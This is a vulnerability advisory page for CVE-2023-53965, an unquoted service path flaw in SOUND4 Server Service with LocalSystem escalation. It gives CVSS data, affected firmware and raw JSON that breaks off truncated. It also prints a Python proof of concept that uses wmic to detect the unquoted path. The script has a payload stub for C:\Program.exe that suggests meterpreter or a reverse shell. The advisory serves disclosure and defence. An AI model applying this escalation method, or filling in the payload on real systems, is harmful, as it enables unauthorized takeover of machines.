Security Vulnerability Report
中文
CVE-2023-53965 CVSS 8.4 HIGH

CVE-2023-53965

Published: 2025-12-22 22:16:01
Last Modified: 2026-01-29 16:11:32
Source: [email protected]

Description

SOUND4 Server Service 4.1.102 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during service startup.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:4.1.102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:4.1.102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:4.1.102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_eco_firmware:4.1.102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact_eco:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_eco_firmware:4.1.102:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse_eco:-:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 Server Service 4.1.102

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53965 PoC - Unquoted Service Path # Author: VulnCheck # Target: SOUND4 Server Service 4.1.102 import os import sys import subprocess def check_unquoted_path(): """Check if SOUND4 service has unquoted path""" try: result = subprocess.check_output( ['wmic', 'service', 'get', 'name,pathname', '/format:csv'], text=True ) for line in result.split('\n'): if 'SOUND4' in line.upper() or 'sound4' in line.lower(): print(f"[+] Found SOUND4 Service: {line}") if '"' not in line: print("[!] VULNERABLE: Path is not quoted!") return True return False except Exception as e: print(f"[-] Error: {e}") return False def create_payload(payload_path="C:\\Program.exe"): """Generate malicious executable for privilege escalation This is a placeholder - replace with actual meterpreter/reverse_shell """ # Attack scenario: # 1. Create malicious executable at C:\Program.exe # 2. Wait for service restart or reboot # 3. Malicious code executes with LocalSystem privileges print(f"[!] In production: Create payload at {payload_path}") print("[!] Payload will execute with LocalSystem privileges") if __name__ == "__main__": print("CVE-2023-53965 - SOUND4 Server Service Unquoted Path") print("=" * 50) check_unquoted_path() create_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53965", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:01.027", "lastModified": "2026-01-29T16:11:32.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 Server Service 4.1.102 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during service startup."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:4.1.102:*:*:*:*:*:*:*", "matchCriteriaId": "03E70884-24F6-46C3-97BE-93AED751BF6B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF502CEB-F8A3-4161-B78A-338F3108A1CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:4.1.102:*:*:*:*:*:*:*", "matchCriteriaId": "FF69B79F-EE2B-4729-B3DD-611BDD6FA0B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:-:*:*:*:*:*:*:*", "matchCriteriaId": "8EF56652-B226-4487-9757-F3114DAD358E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:4.1.102:*:*:*:*:*:*:*", "matchCriteriaId": "B922347D-A2D6-4198-B679-19D9214CB4C2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:first:-:*:*:*:*:*:*:*", "matchCriteriaId": "0ECA96F8-4038-4257-84DA-9D17BA0A9198"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_eco_firmware:4.1.102:*:*:*:*:*:*:*", "matchCriteriaId": "EAC64E89-392E-4F15-B8E7-8E252BBA5BA4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact_eco:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4B0A611-C50E-4397-ACDF-8D090D4AFC88"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": fals ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.